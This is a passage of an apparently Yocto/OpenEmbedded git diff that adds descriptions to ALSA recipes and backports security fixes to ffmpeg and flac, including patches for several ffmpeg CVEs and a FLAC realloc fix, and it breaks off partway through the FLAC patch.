+ install -m 0644 wens.key.pub.pem ${D}${sysconfdir}/wireless-regdb/pubkeys/wens.key.pub.pem
install -m 0644 -D regulatory.db ${D}${nonarch_base_libdir}/firmware/regulatory.db
install -m 0644 regulatory.db.p7s ${D}${nonarch_base_libdir}/firmware/regulatory.db.p7s
diff --git a/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb b/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb
index e2bc61fbe9..4867c798b9 100644
--- a/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb
+++ b/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb
@@ -1,4 +1,6 @@
SUMMARY = "ALSA sound library"
+DESCRIPTION = "(Occasionally a.k.a. libasound) is a userspace library that \
+provides a level of abstraction over the /dev interfaces provided by the kernel modules."
HOMEPAGE = "http://www.alsa-project.org"
BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
SECTION = "libs/multimedia"
diff --git a/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb b/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb
index 61d394b0f0..8205982fcc 100644
--- a/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb
+++ b/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb
@@ -1,4 +1,7 @@
SUMMARY = "ALSA Plugins"
+DESCRIPTION = "Used to create virtual devices that can be used like normal \
+hardware devices but cause extra processing of the sound stream to take place. \
+They are used while configuring ALSA in the .asoundrc file."
HOMEPAGE = "http://alsa-project.org"
BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
SECTION = "multimedia"
@@ -33,7 +36,7 @@ PACKAGECONFIG ??= "\
speexdsp \
${@bb.utils.filter('DISTRO_FEATURES', 'pulseaudio', d)} \
"
-PACKAGECONFIG[aaf] = "--enable-aaf,--disable-aaf,avtp"
+PACKAGECONFIG[aaf] = "--enable-aaf,--disable-aaf,libavtp"
PACKAGECONFIG[jack] = "--enable-jack,--disable-jack,jack"
PACKAGECONFIG[libav] = "--enable-libav,--disable-libav,libav"
PACKAGECONFIG[maemo-plugin] = "--enable-maemo-plugin,--disable-maemo-plugin"
diff --git a/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb b/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb
index c1f4acdb03..c979d7642e 100644
--- a/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb
+++ b/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb
@@ -1,4 +1,7 @@
SUMMARY = "Advanced tools for certain ALSA sound card drivers"
+DESCRIPTION = "Package containing a number of tools ranging from envy24control \
+which provides complete control over all devices with an envy24 chip, to \
+firmware loaders for pcmcia, USB and the hdsp devices."
HOMEPAGE = "http://www.alsa-project.org"
BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
SECTION = "console/utils"
diff --git a/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb b/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb
index 5101cc7b7a..2ff5494c99 100644
--- a/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb
+++ b/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb
@@ -1,4 +1,7 @@
SUMMARY = "ALSA topology configuration files"
+DESCRIPTION = "Provides a method for audio drivers to load their mixers, \
+routing, PCMs and capabilities from user space at runtime without changing \
+any driver source code."
HOMEPAGE = "https://alsa-project.org"
BUGTRACKER = "https://alsa-project.org/wiki/Bug_Tracking"
LICENSE = "BSD-3-Clause"
diff --git a/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb b/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb
index a432d5de07..ee1688b421 100644
--- a/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb
+++ b/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb
@@ -1,4 +1,7 @@
SUMMARY = "ALSA Use Case Manager configuration"
+DESCRIPTION = "This package contains ALSA Use Case Manager configuration \
+of audio input/output names and routing for specific audio hardware. \
+They can be used with the alsaucm tool. "
HOMEPAGE = "https://alsa-project.org"
BUGTRACKER = "https://alsa-project.org/wiki/Bug_Tracking"
LICENSE = "BSD-3-Clause"
diff --git a/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb b/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb
index 1dc30f377b..54aa2f9544 100644
--- a/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb
+++ b/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb
@@ -1,4 +1,6 @@
SUMMARY = "ALSA sound utilities"
+DESCRIPTION = "collection of small and often extremely powerful applications \
+designed to allow users to control the various parts of the ALSA system."
HOMEPAGE = "http://www.alsa-project.org"
BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
SECTION = "console/utils"
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/0001-libavutil-include-assembly-with-full-path-from-sourc.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/0001-libavutil-include-assembly-with-full-path-from-sourc.patch
new file mode 100644
index 0000000000..3b503c49c9
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/0001-libavutil-include-assembly-with-full-path-from-sourc.patch
@@ -0,0 +1,97 @@
+From 24a58d70cbb3997e471366bd5afe54be9007bfb1 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 10 Nov 2020 15:32:14 +0000
+Subject: [PATCH] libavutil: include assembly with full path from source root
+
+Otherwise nasm writes the full host-specific paths into .o
+output, which breaks binary reproducibility.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ libavutil/x86/cpuid.asm | 2 +-
+ libavutil/x86/emms.asm | 2 +-
+ libavutil/x86/fixed_dsp.asm | 2 +-
+ libavutil/x86/float_dsp.asm | 2 +-
+ libavutil/x86/lls.asm | 2 +-
+ libavutil/x86/pixelutils.asm | 2 +-
+ 6 files changed, 6 insertions(+), 6 deletions(-)
+
+diff --git a/libavutil/x86/cpuid.asm b/libavutil/x86/cpuid.asm
+index c3f7866..766f77f 100644
+--- a/libavutil/x86/cpuid.asm
++++ b/libavutil/x86/cpuid.asm
+@@ -21,7 +21,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+
+ SECTION .text
+
+diff --git a/libavutil/x86/emms.asm b/libavutil/x86/emms.asm
+index 8611762..df84f22 100644
+--- a/libavutil/x86/emms.asm
++++ b/libavutil/x86/emms.asm
+@@ -18,7 +18,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+
+ SECTION .text
+
+diff --git a/libavutil/x86/fixed_dsp.asm b/libavutil/x86/fixed_dsp.asm
+index 979dd5c..2f41185 100644
+--- a/libavutil/x86/fixed_dsp.asm
++++ b/libavutil/x86/fixed_dsp.asm
+@@ -20,7 +20,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+
+ SECTION .text
+
+diff --git a/libavutil/x86/float_dsp.asm b/libavutil/x86/float_dsp.asm
+index 517fd63..b773e61 100644
+--- a/libavutil/x86/float_dsp.asm
++++ b/libavutil/x86/float_dsp.asm
+@@ -20,7 +20,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+
+ SECTION_RODATA 32
+ pd_reverse: dd 7, 6, 5, 4, 3, 2, 1, 0
+diff --git a/libavutil/x86/lls.asm b/libavutil/x86/lls.asm
+index 317fba6..d2526d1 100644
+--- a/libavutil/x86/lls.asm
++++ b/libavutil/x86/lls.asm
+@@ -20,7 +20,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+
+ SECTION .text
+
+diff --git a/libavutil/x86/pixelutils.asm b/libavutil/x86/pixelutils.asm
+index 36c57c5..8b45ead 100644
+--- a/libavutil/x86/pixelutils.asm
++++ b/libavutil/x86/pixelutils.asm
+@@ -21,7 +21,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+
+ SECTION .text
+
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch
new file mode 100644
index 0000000000..abfc024820
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch
@@ -0,0 +1,61 @@
+From 3bce9e9b3ea35c54bacccc793d7da99ea5157532 Mon Sep 17 00:00:00 2001
+From: Paul B Mahol <onemda@gmail.com>
+Date: Mon, 27 Jan 2020 21:53:08 +0100
+Subject: [PATCH] avformat/tty: add probe function
+
+CVE: CVE-2021-3566
+Signed-off-by: Saloni Jain <salonij@kpit.com>
+
+Upstream-Status: Backport [http://git.videolan.org/?p=ffmpeg.git;a=patch;h=3bce9e9b3ea35c54bacccc793d7da99ea5157532]
+Comment: No changes/refreshing done.
+---
+ libavformat/tty.c | 21 ++++++++++++++++++++-
+ 1 file changed, 20 insertions(+), 1 deletion(-)
+
+diff --git a/libavformat/tty.c b/libavformat/tty.c
+index 8d48f2c45c12..60f7e9f87ee7 100644
+--- a/libavformat/tty.c
++++ b/libavformat/tty.c
+@@ -34,6 +34,13 @@
+ #include "internal.h"
+ #include "sauce.h"
+
++static int isansicode(int x)
++{
++ return x == 0x1B || x == 0x0A || x == 0x0D || (x >= 0x20 && x < 0x7f);
++}
++
++static const char tty_extensions[31] = "ans,art,asc,diz,ice,nfo,txt,vt";
++
+ typedef struct TtyDemuxContext {
+ AVClass *class;
+ int chars_per_frame;
+@@ -42,6 +49,17 @@ typedef struct TtyDemuxContext {
+ AVRational framerate; /**< Set by a private option. */
+ } TtyDemuxContext;
+
++static int read_probe(const AVProbeData *p)
++{
++ int cnt = 0;
++
++ for (int i = 0; i < p->buf_size; i++)
++ cnt += !!isansicode(p->buf[i]);
++
++ return (cnt * 100LL / p->buf_size) * (cnt > 400) *
++ !!av_match_ext(p->filename, tty_extensions);
++}
++
+ /**
+ * Parse EFI header
+ */
+@@ -153,8 +171,9 @@ AVInputFormat ff_tty_demuxer = {
+ .name = "tty",
+ .long_name = NULL_IF_CONFIG_SMALL("Tele-typewriter"),
+ .priv_data_size = sizeof(TtyDemuxContext),
++ .read_probe = read_probe,
+ .read_header = read_header,
+ .read_packet = read_packet,
+- .extensions = "ans,art,asc,diz,ice,nfo,txt,vt",
++ .extensions = tty_extensions,
+ .priv_class = &tty_demuxer_class,
+ };
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch
new file mode 100644
index 0000000000..e5be985fc3
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch
@@ -0,0 +1,53 @@
+From e01d306c647b5827102260b885faa223b646d2d1 Mon Sep 17 00:00:00 2001
+From: James Almer <jamrial@gmail.com>
+Date: Wed, 21 Jul 2021 01:02:44 -0300
+Subject: [PATCH] avcodec/utils: don't return negative values in
+ av_get_audio_frame_duration()
+
+In some extrme cases, like with adpcm_ms samples with an extremely high channel
+count, get_audio_frame_duration() may return a negative frame duration value.
+Don't propagate it, and instead return 0, signaling that a duration could not
+be determined.
+
+CVE: CVE-2021-3566
+Fixes ticket #9312
+Signed-off-by: James Almer <jamrial@gmail.com>
+Signed-off-by: Saloni Jain <salonij@kpit.com>
+
+Upstream-Status: Backport [http://git.videolan.org/?p=ffmpeg.git;a=patch;h=e01d306c647b5827102260b885faa223b646d2d1]
+Comment: No changes/refreshing done.
+---
+ libavcodec/utils.c | 6 ++++--
+ 1 file changed, 4 insertions(+), 2 deletions(-)
+
+diff --git a/libavcodec/utils.c b/libavcodec/utils.c
+index 5fad782f5a..cfc07cbcb8 100644
+--- a/libavcodec/utils.c
++++ b/libavcodec/utils.c
+@@ -810,20 +810,22 @@ static int get_audio_frame_duration(enum AVCodecID id, int sr, int ch, int ba,
+
+ int av_get_audio_frame_duration(AVCodecContext *avctx, int frame_bytes)
+ {
+- return get_audio_frame_duration(avctx->codec_id, avctx->sample_rate,
++ int duration = get_audio_frame_duration(avctx->codec_id, avctx->sample_rate,
+ avctx->channels, avctx->block_align,
+ avctx->codec_tag, avctx->bits_per_coded_sample,
+ avctx->bit_rate, avctx->extradata, avctx->frame_size,
+ frame_bytes);
++ return FFMAX(0, duration);
+ }
+
+ int av_get_audio_frame_duration2(AVCodecParameters *par, int frame_bytes)
+ {
+- return get_audio_frame_duration(par->codec_id, par->sample_rate,
++ int duration = get_audio_frame_duration(par->codec_id, par->sample_rate,
+ par->channels, par->block_align,
+ par->codec_tag, par->bits_per_coded_sample,
+ par->bit_rate, par->extradata, par->frame_size,
+ frame_bytes);
++ return FFMAX(0, duration);
+ }
+
+ #if !HAVE_THREADS
+--
+2.20.1
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch
new file mode 100644
index 0000000000..bd8a08a216
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch
@@ -0,0 +1,36 @@
+From: Michael Niedermayer <michael@niedermayer.cc>
+Date: Sun, 27 Feb 2022 14:43:04 +0100
+Subject: [PATCH] avcodec/g729_parser: Check channels
+
+Fixes: signed integer overflow: 10 * 808464428 cannot be represented in type 'int'
+Fixes: assertion failure
+Fixes: ticket9651
+
+Reviewed-by: Paul B Mahol <onemda@gmail.com>
+Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
+(cherry picked from commit 757da974b21833529cc41bdcc9684c29660cdfa8)
+Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
+
+CVE: CVE-2022-1475
+Upstream-Status: Backport [https://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=e9e2ddbc6c78cc18b76093617f82c920e58a8d1f]
+Comment: Patch is refreshed as per ffmpeg codebase
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+
+---
+ libavcodec/g729_parser.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+Index: ffmpeg-4.2.2/libavcodec/g729_parser.c
+===================================================================
+--- a/libavcodec/g729_parser.c
++++ b/libavcodec/g729_parser.c
+@@ -48,6 +48,9 @@ static int g729_parse(AVCodecParserConte
+ av_assert1(avctx->codec_id == AV_CODEC_ID_G729);
+ /* FIXME: replace this heuristic block_size with more precise estimate */
+ s->block_size = (avctx->bit_rate < 8000) ? G729D_6K4_BLOCK_SIZE : G729_8K_BLOCK_SIZE;
++ // channels > 2 is invalid, we pass the packet on unchanged
++ if (avctx->channels > 2)
++ s->block_size = 0;
+ s->block_size *= avctx->channels;
+ s->duration = avctx->frame_size;
+ }
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch
new file mode 100644
index 0000000000..febf49cff2
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch
@@ -0,0 +1,41 @@
+From 656cb0450aeb73b25d7d26980af342b37ac4c568 Mon Sep 17 00:00:00 2001
+From: Jiasheng Jiang <jiasheng@iscas.ac.cn>
+Date: Tue, 15 Feb 2022 17:58:08 +0800
+Subject: [PATCH] avcodec/vp3: Add missing check for av_malloc
+
+Since the av_malloc() may fail and return NULL pointer,
+it is needed that the 's->edge_emu_buffer' should be checked
+whether the new allocation is success.
+
+Fixes: d14723861b ("VP3: fix decoding of videos with stride > 2048")
+
+CVE: CVE-2022-3109
+Upstream-Status: Backport [https://github.com/FFmpeg/FFmpeg/commit/656cb0450aeb73b25d7d26980af342b37ac4c568]
+Comments: Refreshed hunk
+
+Reviewed-by: Peter Ross <pross@xvid.org>
+Signed-off-by: Jiasheng Jiang <jiasheng@iscas.ac.cn>
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ libavcodec/vp3.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/libavcodec/vp3.c b/libavcodec/vp3.c
+index e9ab54d73677..e2418eb6fa04 100644
+--- a/libavcodec/vp3.c
++++ b/libavcodec/vp3.c
+@@ -2740,8 +2740,13 @@
+ if (ff_thread_get_buffer(avctx, &s->current_frame, AV_GET_BUFFER_FLAG_REF) < 0)
+ goto error;
+
+- if (!s->edge_emu_buffer)
++ if (!s->edge_emu_buffer) {
+ s->edge_emu_buffer = av_malloc(9 * FFABS(s->current_frame.f->linesize[0]));
++ if (!s->edge_emu_buffer) {
++ ret = AVERROR(ENOMEM);
++ goto error;
++ }
++ }
+
+ if (s->keyframe) {
+ if (!s->theora) {
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch
new file mode 100644
index 0000000000..fcbd9b3e1b
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch
@@ -0,0 +1,67 @@
+From 9cf652cef49d74afe3d454f27d49eb1a1394951e Mon Sep 17 00:00:00 2001
+From: Jiasheng Jiang <jiasheng@iscas.ac.cn>
+Date: Wed, 23 Feb 2022 10:31:59 +0800
+Subject: [PATCH] avformat/nutdec: Add check for avformat_new_stream
+
+Check for failure of avformat_new_stream() and propagate
+the error code.
+
+Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
+
+CVE: CVE-2022-3341
+
+Upstream-Status: Backport [https://github.com/FFmpeg/FFmpeg/commit/9cf652cef49d74afe3d454f27d49eb1a1394951e]
+
+Comments: Refreshed Hunk
+Signed-off-by: Narpat Mali <narpat.mali@windriver.com>
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ libavformat/nutdec.c | 16 ++++++++++++----
+ 1 file changed, 12 insertions(+), 4 deletions(-)
+
+diff --git a/libavformat/nutdec.c b/libavformat/nutdec.c
+index 0a8a700acf..f9ad2c0af1 100644
+--- a/libavformat/nutdec.c
++++ b/libavformat/nutdec.c
+@@ -351,8 +351,12 @@ static int decode_main_header(NUTContext *nut)
+ ret = AVERROR(ENOMEM);
+ goto fail;
+ }
+- for (i = 0; i < stream_count; i++)
+- avformat_new_stream(s, NULL);
++ for (i = 0; i < stream_count; i++) {
++ if (!avformat_new_stream(s, NULL)) {
++ ret = AVERROR(ENOMEM);
++ goto fail;
++ }
++ }
+
+ return 0;
+ fail:
+@@ -793,19 +793,23 @@
+ NUTContext *nut = s->priv_data;
+ AVIOContext *bc = s->pb;
+ int64_t pos;
+- int initialized_stream_count;
++ int initialized_stream_count, ret;
+
+ nut->avf = s;
+
+ /* main header */
+ pos = 0;
++ ret = 0;
+ do {
++ if (ret == AVERROR(ENOMEM))
++ return ret;
++
+ pos = find_startcode(bc, MAIN_STARTCODE, pos) + 1;
+ if (pos < 0 + 1) {
+ av_log(s, AV_LOG_ERROR, "No main startcode found.\n");
+ goto fail;
+ }
+- } while (decode_main_header(nut) < 0);
++ } while ((ret = decode_main_header(nut)) < 0);
+
+ /* stream headers */
+ pos = 0;
+
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch
new file mode 100644
index 0000000000..707073709a
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch
@@ -0,0 +1,136 @@
+From d4b7b3c03ee2baf0166ce49dff17ec9beff684db Mon Sep 17 00:00:00 2001
+From: Anton Khirnov <anton@khirnov.net>
+Date: Fri, 2 Sep 2022 22:21:27 +0200
+Subject: [PATCH] lavc/pthread_frame: avoid leaving stale hwaccel state in
+ worker threads
+
+This state is not refcounted, so make sure it always has a well-defined
+owner.
+
+Remove the block added in 091341f2ab5bd35ca1a2aae90503adc74f8d3523, as
+this commit also solves that issue in a more general way.
+
+(cherry picked from commit cc867f2c09d2b69cee8a0eccd62aff002cbbfe11)
+Signed-off-by: Anton Khirnov <anton@khirnov.net>
+(cherry picked from commit 35aa7e70e7ec350319e7634a30d8d8aa1e6ecdda)
+Signed-off-by: Anton Khirnov <anton@khirnov.net>
+(cherry picked from commit 3bc28e9d1ab33627cea3c632dd6b0c33e22e93ba)
+Signed-off-by: Anton Khirnov <anton@khirnov.net>
+
+CVE: CVE-2022-48434
+Upstream-Status: Backport [https://git.ffmpeg.org/gitweb/ffmpeg.git/commit/d4b7b3c03ee2baf0166ce49dff17ec9beff684db]
+Signed-off-by: Ranjitsinh Rathod ranjitsinh.rathod@kpit.com
+Comment: Hunk#6 refreshed to backport changes and other to remove patch-fuzz warnings
+---
+ libavcodec/pthread_frame.c | 46 +++++++++++++++++++++++++++++---------
+ 1 file changed, 35 insertions(+), 11 deletions(-)
+
+diff --git a/libavcodec/pthread_frame.c b/libavcodec/pthread_frame.c
+index 36ac0ac..bbc5ba6 100644
+--- a/libavcodec/pthread_frame.c
++++ b/libavcodec/pthread_frame.c
+@@ -135,6 +135,12 @@ typedef struct FrameThreadContext {
+ * Set for the first N packets, where N is the number of threads.
+ * While it is set, ff_thread_en/decode_frame won't return any results.
+ */
++
++ /* hwaccel state is temporarily stored here in order to transfer its ownership
++ * to the next decoding thread without the need for extra synchronization */
++ const AVHWAccel *stash_hwaccel;
++ void *stash_hwaccel_context;
++ void *stash_hwaccel_priv;
+ } FrameThreadContext;
+
+ #define THREAD_SAFE_CALLBACKS(avctx) \
+@@ -211,9 +217,17 @@ static attribute_align_arg void *frame_worker_thread(void *arg)
+ ff_thread_finish_setup(avctx);
+
+ if (p->hwaccel_serializing) {
++ /* wipe hwaccel state to avoid stale pointers lying around;
++ * the state was transferred to FrameThreadContext in
++ * ff_thread_finish_setup(), so nothing is leaked */
++ avctx->hwaccel = NULL;
++ avctx->hwaccel_context = NULL;
++ avctx->internal->hwaccel_priv_data = NULL;
++
+ p->hwaccel_serializing = 0;
+ pthread_mutex_unlock(&p->parent->hwaccel_mutex);
+ }
++ av_assert0(!avctx->hwaccel);
+
+ if (p->async_serializing) {
+ p->async_serializing = 0;
+@@ -275,14 +289,10 @@ static int update_context_from_thread(AVCodecContext *dst, AVCodecContext *src,
+ dst->color_range = src->color_range;
+ dst->chroma_sample_location = src->chroma_sample_location;
+
+- dst->hwaccel = src->hwaccel;
+- dst->hwaccel_context = src->hwaccel_context;
+-
+ dst->channels = src->channels;
+ dst->sample_rate = src->sample_rate;
+ dst->sample_fmt = src->sample_fmt;
+ dst->channel_layout = src->channel_layout;
+- dst->internal->hwaccel_priv_data = src->internal->hwaccel_priv_data;
+
+ if (!!dst->hw_frames_ctx != !!src->hw_frames_ctx ||
+ (dst->hw_frames_ctx && dst->hw_frames_ctx->data != src->hw_frames_ctx->data)) {
+@@ -415,6 +425,12 @@ static int submit_packet(PerThreadContext *p, AVCodecContext *user_avctx,
+ pthread_mutex_unlock(&p->mutex);
+ return err;
+ }
++
++ /* transfer hwaccel state stashed from previous thread, if any */
++ av_assert0(!p->avctx->hwaccel);
++ FFSWAP(const AVHWAccel*, p->avctx->hwaccel, fctx->stash_hwaccel);
++ FFSWAP(void*, p->avctx->hwaccel_context, fctx->stash_hwaccel_context);
++ FFSWAP(void*, p->avctx->internal->hwaccel_priv_data, fctx->stash_hwaccel_priv);
+ }
+
+ av_packet_unref(&p->avpkt);
+@@ -616,6 +632,14 @@ void ff_thread_finish_setup(AVCodecContext *avctx) {
+ async_lock(p->parent);
+ }
+
++ /* save hwaccel state for passing to the next thread;
++ * this is done here so that this worker thread can wipe its own hwaccel
++ * state after decoding, without requiring synchronization */
++ av_assert0(!p->parent->stash_hwaccel);
++ p->parent->stash_hwaccel = avctx->hwaccel;
++ p->parent->stash_hwaccel_context = avctx->hwaccel_context;
++ p->parent->stash_hwaccel_priv = avctx->internal->hwaccel_priv_data;
++
+ pthread_mutex_lock(&p->progress_mutex);
+ if(atomic_load(&p->state) == STATE_SETUP_FINISHED){
+ av_log(avctx, AV_LOG_WARNING, "Multiple ff_thread_finish_setup() calls\n");
+@@ -657,13 +681,6 @@ void ff_frame_thread_free(AVCodecContext *avctx, int thread_count)
+
+ park_frame_worker_threads(fctx, thread_count);
+
+- if (fctx->prev_thread && fctx->prev_thread != fctx->threads)
+- if (update_context_from_thread(fctx->threads->avctx, fctx->prev_thread->avctx, 0) < 0) {
+- av_log(avctx, AV_LOG_ERROR, "Final thread update failed\n");
+- fctx->prev_thread->avctx->internal->is_copy = fctx->threads->avctx->internal->is_copy;
+- fctx->threads->avctx->internal->is_copy = 1;
+- }
+-
+ for (i = 0; i < thread_count; i++) {
+ PerThreadContext *p = &fctx->threads[i];
+
+@@ -713,6 +730,13 @@ void ff_frame_thread_free(AVCodecContext *avctx, int thread_count)
+ pthread_mutex_destroy(&fctx->async_mutex);
+ pthread_cond_destroy(&fctx->async_cond);
+
++ /* if we have stashed hwaccel state, move it to the user-facing context,
++ * so it will be freed in avcodec_close() */
++ av_assert0(!avctx->hwaccel);
++ FFSWAP(const AVHWAccel*, avctx->hwaccel, fctx->stash_hwaccel);
++ FFSWAP(void*, avctx->hwaccel_context, fctx->stash_hwaccel_context);
++ FFSWAP(void*, avctx->internal->hwaccel_priv_data, fctx->stash_hwaccel_priv);
++
+ av_freep(&avctx->internal->thread_ctx);
+
+ if (avctx->priv_data && avctx->codec && avctx->codec->priv_class)
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb b/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb
index fddfef9e27..f12052548f 100644
--- a/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb
@@ -26,7 +26,14 @@ LIC_FILES_CHKSUM = "file://COPYING.GPLv2;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
SRC_URI = "https://www.ffmpeg.org/releases/${BP}.tar.xz \
file://mips64_cpu_detection.patch \
file://CVE-2020-12284.patch \
- "
+ file://0001-libavutil-include-assembly-with-full-path-from-sourc.patch \
+ file://CVE-2021-3566.patch \
+ file://CVE-2021-38291.patch \
+ file://CVE-2022-1475.patch \
+ file://CVE-2022-3109.patch \
+ file://CVE-2022-3341.patch \
+ file://CVE-2022-48434.patch \
+ "
SRC_URI[md5sum] = "348956fc2faa57a2f79bbb84ded9fbc3"
SRC_URI[sha256sum] = "cb754255ab0ee2ea5f66f8850e1bd6ad5cac1cd855d0a2f4990fb8c668b0d29c"
@@ -129,6 +136,11 @@ do_configure() {
${S}/configure ${EXTRA_OECONF}
}
+# patch out build host paths for reproducibility
+do_compile_prepend_class-target() {
+ sed -i -e "s,${WORKDIR},,g" ${B}/config.h
+}
+
PACKAGES =+ "libavcodec \
libavdevice \
libavfilter \
diff --git a/meta/recipes-multimedia/flac/files/CVE-2020-22219.patch b/meta/recipes-multimedia/flac/files/CVE-2020-22219.patch
new file mode 100644
index 0000000000..e042872dc0
--- /dev/null
+++ b/meta/recipes-multimedia/flac/files/CVE-2020-22219.patch
@@ -0,0 +1,197 @@
+From 579ff6922089cbbbd179619e40e622e279bd719f Mon Sep 17 00:00:00 2001
+From: Martijn van Beurden <mvanb1@gmail.com>
+Date: Wed, 3 Aug 2022 13:52:19 +0200
+Subject: [PATCH] flac: Add and use _nofree variants of safe_realloc functions
+
+Parts of the code use realloc like
+
+x = safe_realloc(x, somesize);
+
+when this is the case, the safe_realloc variant used must free the
+old memory block in case it fails, otherwise it will leak. However,
+there are also instances in the code where handling is different:
+
+if (0 == (x = safe_realloc(y, somesize)))
+ return false
+
+in this case, y should not be freed, as y is not set to NULL we
+could encounter double frees. Here the safe_realloc_nofree
+functions are used.
+
+Upstream-Status: Backport [https://github.com/xiph/flac/commit/21fe95ee828b0b9b944f6aa0bb02d24fbb981815]
+CVE: CVE-2020-22219
+
+Signed-off-by: Meenali Gupta <meenali.gupta@windriver.com>
+---
+ include/share/alloc.h | 41 +++++++++++++++++++++++++++++++----
+ src/flac/encode.c | 4 ++--
+ src/flac/foreign_metadata.c | 2 +-
+ src/libFLAC/bitwriter.c | 2 +-
+ src/libFLAC/metadata_object.c | 2 +-
+ src/plugin_common/tags.c | 2 +-
+ src/share/utf8/iconvert.c | 2 +-
+ 7 files changed, 44 insertions(+), 11 deletions(-)
+
+diff --git a/include/share/alloc.h b/include/share/alloc.h
+index 914de9b..55bdd1d 100644
+--- a/include/share/alloc.h
++++ b/include/share/alloc.h
+@@ -161,17 +161,30 @@ static inline void *safe_realloc_(void *ptr, size_t size)
+ free(oldptr);
+ return newptr;
+ }
+-static inline void *safe_realloc_add_2op_(void *ptr, size_t size1, size_t size2)
